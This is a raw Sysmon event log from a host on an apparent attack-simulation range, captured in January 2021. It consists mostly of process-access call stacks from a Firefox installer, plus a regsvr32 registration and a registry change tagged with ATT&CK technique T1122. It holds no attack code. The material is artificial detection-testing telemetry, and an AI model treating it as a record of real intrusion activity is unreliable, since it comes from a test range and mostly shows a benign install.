13:59:52.974{59A5CD1D-93F6-6005-E604-00000000A301}48881684C:\Windows\system32\csrss.exe{59A5CD1D-9458-6005-2D05-00000000A301}1508C:\Windows\system32\regsvr32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000016166Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.974{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-9458-6005-2D05-00000000A301}1508C:\Windows\system32\regsvr32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+57f3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+1eeb|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 154100x800000000000000016165Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.984{59A5CD1D-9458-6005-2D05-00000000A301}1508C:\Windows\System32\regsvr32.exe10.0.14393.0 (rs1_release.160715-1616)Microsoft(C) Register ServerMicrosoft® Windows® Operating SystemMicrosoft CorporationREGSVR32.EXE"C:\Windows\system32\regsvr32.exe" /s "C:\Program Files\Mozilla Firefox\AccessibleHandler.dll"C:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=8CF9086BE38A15E905924B4A45D814D9,SHA256=00A1CF85C6AB96DF38A4023F0CEE4DF60F62280768FC9C06A235E6D2D644169D,IMPHASH=1C8D7F52BBDAEF92EB0104CB6362D5D0{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe.\setup.exe /LaunchedFromStub /INI=C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\config.ini 10341000x800000000000000016164Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.974{59A5CD1D-8E46-6005-1200-00000000A301}12124900C:\Windows\System32\svchost.exe{59A5CD1D-9458-6005-2D05-00000000A301}1508C:\Windows\system32\regsvr32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac06|c:\windows\system32\pcasvc.dll+aa66|c:\windows\system32\pcasvc.dll+aa28|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000016163Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1122SetValue2021-01-18 13:59:52.974{59A5CD1D-9458-6005-2C05-00000000A301}4956C:\Windows\system32\regsvr32.exeHKCR\CLSID\{1814CEEB-49E2-407F-AF99-FA755A7D2607}\InProcServer32\(Default)C:\Program Files\Mozilla Firefox\AccessibleMarshal.dll 10341000x800000000000000016162Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.958{59A5CD1D-8E46-6005-1600-00000000A301}15444140C:\Windows\system32\svchost.exe{59A5CD1D-9458-6005-2C05-00000000A301}4956C:\Windows\system32\regsvr32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016161Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.958{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-9458-6005-2C05-00000000A301}4956C:\Windows\system32\regsvr32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016160Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.927{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000016159Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.927{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000016158Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.927{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016157Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.927{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016156Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.927{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000016155Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.927{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000016154Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.927{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016153Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.927{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000016152Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.927{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000016151Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.927{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000016150Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.927{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016149Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.927{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016148Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.927{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000016147Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.927{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000016146Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.927{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016145Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 